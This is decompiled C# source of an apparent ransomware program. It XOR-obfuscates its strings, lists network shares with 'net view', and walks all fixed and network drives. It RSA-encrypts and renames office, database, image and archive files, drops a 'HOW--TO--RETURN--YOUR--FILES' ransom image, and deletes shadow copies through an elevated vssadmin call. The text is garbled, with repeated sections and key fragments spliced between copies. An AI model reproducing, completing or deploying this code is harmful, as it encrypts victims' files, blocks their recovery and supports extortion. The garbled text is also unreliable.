0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } + fFYiO9CH9iZwwzlsQ3X + qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W + namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } / uOWPVyi0rhyvYmRrGNcIQ == </ Modulus> <Exponent> AQAB </ Exponent> </ RSAKeyValue> namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); 